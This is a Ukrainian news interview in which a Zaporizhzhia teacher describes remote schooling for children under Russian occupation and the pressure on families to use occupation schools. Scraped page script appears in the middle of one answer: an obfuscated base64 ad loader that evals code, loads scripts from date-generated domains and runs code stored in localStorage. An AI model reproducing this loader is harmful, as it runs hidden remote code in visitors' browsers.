Навчання в окупанції: вчителька розповіла про небезпеку та складнощі

На окуповані частині Запорізької області безліч навчальних закладів було захоплено росіянами, які нав’язують дітям і батькам нові правила освіти.

Запорізька вчителька Анастасія Ратнікова, яка дистанційно працює в одній зі шкіл, що евакуювалися, розповіла «Акценту» про нюанси роботи у таких закладах освіти.

Розкажіть, як відбувається евакуація навчального закладу з окупованої території?

Навчальні заклади після того, як наслені пункти було захоплено окупантами, за можливості евакуюються до безпечної території, щоб працювати дистанційно. Навчальний процес значно змінюється, ускладнюється, але його існування дуже важливе.

Які загрози стоять перед батьками та дітьми, які залишилися в окупації на продовжують навчатися дістанційно в українському закладі?

Окупанти шукають родини з дітьми і змушують їх віддавати до окупаційних шкіл, погрожуючи депортацією у разі відмови. Більшість родин з дітьми-школярами виїхали, але є випадки коли діти відвідують онлайн-заняття в рідній школі і в школі окупантів. Знаю, що іноді батьки вимушені переховувати дітей, щоб не віддавати їх до загарбницьких закладів.

Яка ситуація у фейкових навчальних закладах окупантів? Чи ходять туди діти?

Ходять, але їхня кількість мізерна. У «кращому» випадку, 5 дітей відвідує клас у школі. Якість освіти у таких закладах — нульова. Справжні фахівці не будуть працювати з окупантами. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

А хто ж працює в навчальних закладах окупантів?

Часті ті, хто не заслуговував на місце серед українських вчителів або часто навіть мав образу на керівництво закладу. Звільнені раніше пиятики, корупціонери, прибиральниці, які захотіли нову кар’єру. Окупанти беруть на роботу будь-кого. Виходить гарна ілюстрація: нікчемні окупанти, в школах яких працюють нікчемні зрадники.

Чи вплинула окупація на моральний стан дітей, які навчаються дистанційно?

Звісно, вплинула. І впливати продовжує. Дітям важко усвідомити те, що відбулося. Вони схильні до стресу і страху. Інколи зранку після обстрілів ми не проводимо заняття, бо діти чули вибухи вночі і мають відпочити. Але, діти у нас дуже розумні та кмітливі, часто під час нашого спілкування вони все ж демонструють гарний настрій та бажання вчитися. Мені під час таких розмов і самій стає легше.

Що б ви порадили батькам, які залишилися в окупації і вагаються, чи віддавати дітей до навчального закладу окупантів?

Це питання складне. Батьки — це дорослі люди, які взмозі приймати рішення самостійно. Звісно, я проти того, щоб діти залишалися в окупації, бо переживаю за них та їхніх батьків, але ситуації можуть бути різні і не слід робити швидких висновків. Багато хто залишається вимушено, тому що іншого виходу просто немає.

Анастасія Ранкова на робочому місці

Фото: ЗОВА (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/navchannya-v-okupantsiyi-vchitelka-rozpovila-pro-nebezpeku-ta-skladnoshhi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top